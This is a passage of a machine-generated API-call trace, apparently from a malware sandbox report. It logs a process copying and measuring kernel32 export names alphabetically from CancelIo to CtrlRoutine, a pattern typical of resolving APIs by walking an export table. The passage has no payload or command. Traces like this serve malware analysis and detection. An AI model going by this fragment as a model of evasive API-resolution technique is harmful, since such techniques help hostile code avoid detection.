lpString1="CancelIo") returned="CancelIo" [0087.799] lstrlenA (lpString="CANCELIO") returned 8 [0087.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.799] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.799] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.800] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.800] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.800] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.800] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.800] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.800] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.800] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.800] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.800] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.800] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.800] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.800] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.800] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.800] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.800] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.800] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.800] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.800] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.800] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.800] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.801] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.801] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.801] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.801] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.801] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.801] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.801] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.801] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.801] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.801] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.801] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.801] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.801] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.801] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.801] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.801] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.801] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.801] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.801] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.801] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.801] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.801] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.801] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.801] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.801] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.801] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.801] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.801] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.801] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.801] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.801] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.801] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.801] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.801] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.801] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.801] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.801] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.801] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.802] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.802] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.802] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.802] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.802] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.802] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.802] lstrlenA (lpString="COPYFILEA") returned 9 [0087.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.802] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.802] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.802] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.802] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.802] lstrlenA (lpString="COPYFILEW") returned 9 [0087.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.802] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.802] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.802] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.802] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.802] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.802] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.802] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.803] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.803] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.803] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.803] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.803] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.803] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.803] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.803] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.803] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.803] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.803] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.803] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.803] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.803] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.803] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.803] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.803] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.803] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.803] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.803] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.804] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.804] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.804] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.804] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.804] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.804] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.804] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.804] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.804] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.804] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.804] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.804] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.804] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.804] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.804] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.804] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.804] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.804] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.804] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.804] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.805] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.805] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.805] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.805] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.805] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.805] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.805] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.805] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.805] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.805] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.805] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.805] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.805] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.805] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.805] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.805] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.805] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.805] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.805] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.805] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.806] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.806] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.806] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.806] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.806] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.806] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.806] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.806] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.806] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.806] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.806] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.806] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.806] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.806] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.806] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.806] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.806] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.806] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.806] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.806] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.806] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.806] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.806] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.806] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.806] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.806] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.806] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.806] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.806] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.806] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.806] lstrcpyA (in: lpString1=0x3f2d468, 